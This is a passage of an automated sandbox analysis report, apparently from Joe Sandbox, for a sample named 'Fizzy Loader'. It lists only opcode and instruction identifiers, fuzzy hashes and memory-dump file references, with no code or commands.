                                                                                                                                                            • Opcode Fuzzy Hash: 1dbaa94e269986f9b37e76a2a6619d5b814c7501605dd12a51579dd762645134
                                                                                                                                                            • Instruction Fuzzy Hash: F1A16030A1CA498FDB98EB28D849A7877E1FF59344F5401A9D44AC72E2DF25EC42CB85
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c97364c997f89d5517ca0461156d637a95206b5cb728246cad2c837ab9f77a80
                                                                                                                                                            • Instruction ID: ab246744bc5a8b3a780ec00b57250e0fdee12e1b5382a04eca7970a5c1fa7a25
                                                                                                                                                            • Opcode Fuzzy Hash: c97364c997f89d5517ca0461156d637a95206b5cb728246cad2c837ab9f77a80
                                                                                                                                                            • Instruction Fuzzy Hash: 14A1023290D6C91FE756A73C48292E9BFF0EF47390F4801FAD488CB1D7DA19690A8756
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b256234184e3d8c96da8c19c6ec310c10f6831ac3178ea137487d65883a4ccfe
                                                                                                                                                            • Instruction ID: bd13cdb3b86331368e8d438b901dbfa3c8e51bd098860588240a516b0faa0c53
                                                                                                                                                            • Opcode Fuzzy Hash: b256234184e3d8c96da8c19c6ec310c10f6831ac3178ea137487d65883a4ccfe
                                                                                                                                                            • Instruction Fuzzy Hash: 8BB1E331A0D69A4FF795FB6888112B937A1FFA2780F0401BBD44AEB1D7DF28A841C355
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d4b5e31f0fb91b2c647a23d86fcbd811020d454a908b908169da1ace4468d364
                                                                                                                                                            • Instruction ID: c9bb42c342fbca09e5e2858d2e59ac9f9bc04371407073ff1455e3a02c37a344
                                                                                                                                                            • Opcode Fuzzy Hash: d4b5e31f0fb91b2c647a23d86fcbd811020d454a908b908169da1ace4468d364
                                                                                                                                                            • Instruction Fuzzy Hash: 2AC19E74508A4E8FEBC5EF18C4987A937E1FB68305F24457E982DDB295DB369892CB00
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 95a386fba509b0cf029e1be05b5f7944bc09797050d6db95c4b0e779dfcf823e
                                                                                                                                                            • Instruction ID: dad308f24ac9e7c0ece85c517a279ca6eeee93ccc0422235e90e1ce4e2afc71b
                                                                                                                                                            • Opcode Fuzzy Hash: 95a386fba509b0cf029e1be05b5f7944bc09797050d6db95c4b0e779dfcf823e
                                                                                                                                                            • Instruction Fuzzy Hash: BF81783161CF458FF718EB1CD8468B177E0EB953A1F15027EE589C72A2EA21B887C785
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1c7387996d1c24e7c4d93fb5ae27812d9485f8cb60cc717f2bb01ff17733005c
                                                                                                                                                            • Instruction ID: 0ee75b53ad27384192fe85267e8d882b69a3514a4a8105d77e07b2397ad65493
                                                                                                                                                            • Opcode Fuzzy Hash: 1c7387996d1c24e7c4d93fb5ae27812d9485f8cb60cc717f2bb01ff17733005c
                                                                                                                                                            • Instruction Fuzzy Hash: EC912631C0D6CA1FE756E77498255E9BFE1EF4A390F0901FAD48CCB0D3DA18651A8352
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0c329acac1dd0d3db61452244141674bc5991d97e675fcd3d41f4a7e2e0e335a
                                                                                                                                                            • Instruction ID: b4071e329f3fd29349b336d997531b654ab17b0ca1c2ab2be7c90bdfdcea9fd2
                                                                                                                                                            • Opcode Fuzzy Hash: 0c329acac1dd0d3db61452244141674bc5991d97e675fcd3d41f4a7e2e0e335a
                                                                                                                                                            • Instruction Fuzzy Hash: 8F91F431E0D6CA0FE75AA73468251E9BFE0EF46390F0801FBD458CB4D3EA2D591A8756
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8b38a75c03ca693ea257211af8665f6c5d8451fa08a7139214410e5bd7380870
                                                                                                                                                            • Instruction ID: ed136ec76f371c778d941e8c183f36dc9927ea10bef6cd5438ea11c18a54c294
                                                                                                                                                            • Opcode Fuzzy Hash: 8b38a75c03ca693ea257211af8665f6c5d8451fa08a7139214410e5bd7380870
                                                                                                                                                            • Instruction Fuzzy Hash: F6714A31A1DA8A5FE359EB2C98415B67BE0EF95350F0407BED04BC3187DE28B8078395
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f69ff9db8f3490ea8a71e0d9added2faf2a58bfea58acf433ee97fb520d85caa
                                                                                                                                                            • Instruction ID: 847ad7eb302d46981cfc941f51dc486a3775e80074d2356911a51196e9645cf7
                                                                                                                                                            • Opcode Fuzzy Hash: f69ff9db8f3490ea8a71e0d9added2faf2a58bfea58acf433ee97fb520d85caa
                                                                                                                                                            • Instruction Fuzzy Hash: 2781F631C1DACA9FE756A77858151F9BFE0EF46390F0801FAD488CB0D3DB28694A8756
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c19a9dd7eb9a630960cbb5b2874e1016ea7202185b646808b58999dec185dedc
                                                                                                                                                            • Instruction ID: d35f173d38def1a177cb3ca1cc1dfa5e1a5cd28ee9499b0c974482fd632fba8c
                                                                                                                                                            • Opcode Fuzzy Hash: c19a9dd7eb9a630960cbb5b2874e1016ea7202185b646808b58999dec185dedc
                                                                                                                                                            • Instruction Fuzzy Hash: C391F92091D2564EE72EA71484585B0BBF1EF12390F6D48BEC497C31E7E75DACCA8345
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4dfc261bc36f4068653ce2d49d9be26ff7a83d3ef926fed23d8648d18cc61350
                                                                                                                                                            • Instruction ID: 779438efc5f37aea216b2ccead1036e2678d7381de98a7411abf413d22034e0c
                                                                                                                                                            • Opcode Fuzzy Hash: 4dfc261bc36f4068653ce2d49d9be26ff7a83d3ef926fed23d8648d18cc61350
                                                                                                                                                            • Instruction Fuzzy Hash: A171B931A1CA084FDB58EF1CD4469B9B7E1FBA9765F04027EE44AD3292DF21B84287C5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4ea85844378099eaee3ed416a6abd202a98f95346054b95ce2c0628d00b0da17
                                                                                                                                                            • Instruction ID: d60e0e87955d2687e1ed7707861f3ca7bf218fea8561e5cd19a71f31583cdd6e
                                                                                                                                                            • Opcode Fuzzy Hash: 4ea85844378099eaee3ed416a6abd202a98f95346054b95ce2c0628d00b0da17
                                                                                                                                                            • Instruction Fuzzy Hash: DA71A030A1CA058FE7A8FB28D440A71B3D6EF95354F24457DD88AC3696DF29F882C745
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1938c9c3d06564af161e53c6c6b69ba7aa613b8402e13173bf3d9b344aad5281
                                                                                                                                                            • Instruction ID: cca347e550f2537e4b4196562704b2c97524994d03ce83e1c2c709a006d5bd77
                                                                                                                                                            • Opcode Fuzzy Hash: 1938c9c3d06564af161e53c6c6b69ba7aa613b8402e13173bf3d9b344aad5281
                                                                                                                                                            • Instruction Fuzzy Hash: 4C616A31A1CD4A8FEB94EB2DD485AB573E2EF99390B1401B9D40EC7296DF24EC428784
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 652498cc05db568d3cea5e532dc9793e3030255e5b9b26fc81f87d3322214e4c
                                                                                                                                                            • Instruction ID: d52c194e3ead66f8b3d1f6133f2ea6ea8c1722b9ad0c72e9a5097fed3fe32ca4
                                                                                                                                                            • Opcode Fuzzy Hash: 652498cc05db568d3cea5e532dc9793e3030255e5b9b26fc81f87d3322214e4c
                                                                                                                                                            • Instruction Fuzzy Hash: 7F810234A18A4E8FDBC8EF1CC494AAAB3E2FF58344F504569D41DC729ADB35E852CB40
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 082594debfff854a82700c67cbc0265797c8dae52a7143e8656e9a6b213c35a6
                                                                                                                                                            • Instruction ID: 29eab0c2e326fec3ad7d3c03bb982b6192c8e2e89585ff4bbbe04c196e9a8062
                                                                                                                                                            • Opcode Fuzzy Hash: 082594debfff854a82700c67cbc0265797c8dae52a7143e8656e9a6b213c35a6
                                                                                                                                                            • Instruction Fuzzy Hash: 40614432D0CB4C4FEB04EB58A8962FCBBA0FFA9750F0442BBD04C9B192DA346845C791
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 69702bfb16170a19eba6edfe7e622c9c1bc83c546e1cd9c78947e6cbdb446d8b
                                                                                                                                                            • Instruction ID: f583910f4c509c4b0f1e80accd629f5f2480fc6ed857559d85ffc03fe4a0f338
                                                                                                                                                            • Opcode Fuzzy Hash: 69702bfb16170a19eba6edfe7e622c9c1bc83c546e1cd9c78947e6cbdb446d8b
                                                                                                                                                            • Instruction Fuzzy Hash: A9812970D096499FDB84FBA4C8596ECBBF1EFA5740F1000AAD449AB2E2CB782845CB05
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 92bd13f36ccaef622a45107b00925ea18ac4907c14d095a435b3f65f0a5c074d
                                                                                                                                                            • Instruction ID: bebfb71f5ae8c3b258da27f2652caec0af32b372c57df30cc31ab9f02cc86fcc
                                                                                                                                                            • Opcode Fuzzy Hash: 92bd13f36ccaef622a45107b00925ea18ac4907c14d095a435b3f65f0a5c074d
                                                                                                                                                            • Instruction Fuzzy Hash: 02711034A18A4E8FDBC8EF1CC494AAAB3E2FF58344F504568D41DC7296DB35E852CB40
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8de7f1cbd6b5a30798c490ee7383149f848252aca0c0b734f87c6456e097e73c
                                                                                                                                                            • Instruction ID: c9497652e8097f97ab2f35cbec27b613fede0f0fad677e207fe105dd9ef52743
                                                                                                                                                            • Opcode Fuzzy Hash: 8de7f1cbd6b5a30798c490ee7383149f848252aca0c0b734f87c6456e097e73c
                                                                                                                                                            • Instruction Fuzzy Hash: 4251D032A1D5169EE658B76CA4021FD77D0EFA47A8F04027BE84DC72D3CF18684242EA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: eb1064c23630110a2e5c35f1b119fcf31328f9d1dee18641cf38f2dc229684a8
                                                                                                                                                            • Instruction ID: ac23d25cb5799136ff704069416a143e1192c5891e33314d163208ef79e5eb1d
                                                                                                                                                            • Opcode Fuzzy Hash: eb1064c23630110a2e5c35f1b119fcf31328f9d1dee18641cf38f2dc229684a8
                                                                                                                                                            • Instruction Fuzzy Hash: DF41B731B1CA0A8FDB88FB6C945967677E2EFA9340F50057AD00EC72D7DE38A9458744
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1fcff1fe675e426880f7ed16f69ee4b3ea74f0c78388e9e67b3e237493dbf72a
                                                                                                                                                            • Instruction ID: b8fadf6a28b5f73326a99c75eb6e8552dbfc0017517819e05220b7f6a8009e16
                                                                                                                                                            • Opcode Fuzzy Hash: 1fcff1fe675e426880f7ed16f69ee4b3ea74f0c78388e9e67b3e237493dbf72a
                                                                                                                                                            • Instruction Fuzzy Hash: 92411930708A088FD7A8EB2CD499B6577D2EF59751F0501BAE48EC72A6DF24AC81C785
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b573eda9d87a8df15a9d7503860742b30fe3829dd1c274eb68d0ca7c2e3e9a6c
                                                                                                                                                            • Instruction ID: 1f1ab2904602ae246fbaf4c11cd404f46565f08dafbb67cf07b60cafe876ccbb
                                                                                                                                                            • Opcode Fuzzy Hash: b573eda9d87a8df15a9d7503860742b30fe3829dd1c274eb68d0ca7c2e3e9a6c
                                                                                                                                                            • Instruction Fuzzy Hash: A0512374508A4E8FDB85FF58C8446AA73F1FF98340F504A6AE819D72D6CB74E851CB44
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0fc1153a8bb9b7775a4dbdcd876829d0606b5e8ae2e70a4f4162f59ffebf12c1
                                                                                                                                                            • Instruction ID: 8bd5d64c581c45dfa8e118015691f5d36eeaf4d469bfc98e96169ea6e15eab4a
                                                                                                                                                            • Opcode Fuzzy Hash: 0fc1153a8bb9b7775a4dbdcd876829d0606b5e8ae2e70a4f4162f59ffebf12c1
                                                                                                                                                            • Instruction Fuzzy Hash: 9B410654F0F95F1FE68AF768A0292BD2682CFD5AC0F14047AD06DEB5DBDE2E29018305
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ec47b42c72139c782be3f4d0f43f103841a7e9d4019db0761fa814efb60ad18e
                                                                                                                                                            • Instruction ID: 41e01cd6dca226dba50d627120a781ef878ba0fdc941108dd058d2ce215482f1
                                                                                                                                                            • Opcode Fuzzy Hash: ec47b42c72139c782be3f4d0f43f103841a7e9d4019db0761fa814efb60ad18e
                                                                                                                                                            • Instruction Fuzzy Hash: 66418070B1CA4A8FDB8DEF2C8468A7577E2EFA9341F1045B9D00AC72D6DE38A8458744
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: db304b3a78bcc27188946753d5bac1602452b14a3534f3001f9e493fbace1c13
                                                                                                                                                            • Instruction ID: 708f60f63c51b8cc670941b061778a456f70ff00470059b4656036130fa1bd05
                                                                                                                                                            • Opcode Fuzzy Hash: db304b3a78bcc27188946753d5bac1602452b14a3534f3001f9e493fbace1c13
                                                                                                                                                            • Instruction Fuzzy Hash: 4B4126B190CA5E4FE768EF28A8552FAB7A1FF96790F000079E01DC71C3DB3868168785
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bf0f79e25c1ff85173e8bf13aa6c0f670f8c3136cf1f751667404a08cc4920b5
                                                                                                                                                            • Instruction ID: 816471cf64c9cbbed3774027b400abd2c0f564559d86d72a91a921cfb9787614
                                                                                                                                                            • Opcode Fuzzy Hash: bf0f79e25c1ff85173e8bf13aa6c0f670f8c3136cf1f751667404a08cc4920b5
                                                                                                                                                            • Instruction Fuzzy Hash: 01411631A1DB855FE309BB6C985617577D1EF96B50F0402BFE44DC32D3DE28A842829A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9bdd8ee9d90b5ed4854942be02e21eed7cdb89cb8e5ca034f85cd830b03da890
                                                                                                                                                            • Instruction ID: c5c65be0e5eb9f79e927cdff3c77930bf881d805b67227584253718694dba326
                                                                                                                                                            • Opcode Fuzzy Hash: 9bdd8ee9d90b5ed4854942be02e21eed7cdb89cb8e5ca034f85cd830b03da890
                                                                                                                                                            • Instruction Fuzzy Hash: BC41E23190D98A4FD746FB788815AE97BF0EF6A750F0401FBD049D71E3CE18A8468391
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 517ff61b8912d9e3136639a056066d800a7ee9eeb2636b5f1acad23f9a9f0d8d
                                                                                                                                                            • Instruction ID: 7fbde4188d8633eb17fb7649336dbb0a790ca054f38a6050c1e1a7af66fa30bd
                                                                                                                                                            • Opcode Fuzzy Hash: 517ff61b8912d9e3136639a056066d800a7ee9eeb2636b5f1acad23f9a9f0d8d
                                                                                                                                                            • Instruction Fuzzy Hash: C341E130B0D91A8FE6A9EB298444775B2D1FF9839DF558279D00EC79C5DF29E8818344
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4faea5cb959c4303c01ac68e3406d9474e50f54b7acbeaf47c81603e1532ae7f
                                                                                                                                                            • Instruction ID: 1bd11931f3fcde38103dbb6e7f3a6844bcda1d6cc9f850bb34cda3b49e9edfe4
                                                                                                                                                            • Opcode Fuzzy Hash: 4faea5cb959c4303c01ac68e3406d9474e50f54b7acbeaf47c81603e1532ae7f
                                                                                                                                                            • Instruction Fuzzy Hash: E9419231A0CB454FE7A4E728C444B66B7D1FF54389F0845BAD08AC35D1DB6CB885C740
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5a0c9a91926f157e56a61f7e988efc5fb16928028bcef02c3ea6957664a47329
                                                                                                                                                            • Instruction ID: 83235721de124840fd6ab127333ad937e48a21f03842fcc959c06346f510f222
                                                                                                                                                            • Opcode Fuzzy Hash: 5a0c9a91926f157e56a61f7e988efc5fb16928028bcef02c3ea6957664a47329
                                                                                                                                                            • Instruction Fuzzy Hash: 33519270A0CA8A8FDB88DF18D860AA537A1FF69704F1406ADD45DC72C3CB35E856C744
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 55fd03143810ce714be993d966d674472aa0f489d8d939fe08e858183f1d1dc9
                                                                                                                                                            • Instruction ID: 6c107581321baf95b60723871c065d7bd467c05fa1b1c0a1ac7ee10a0fc25f3d
                                                                                                                                                            • Opcode Fuzzy Hash: 55fd03143810ce714be993d966d674472aa0f489d8d939fe08e858183f1d1dc9
                                                                                                                                                            • Instruction Fuzzy Hash: 3541A231F1C9590EF7A9732C6845379A7C1EF997D0F1805BBE01EC22DBDE1C9841428A
                                                                                                                                                            Memory Dump Source
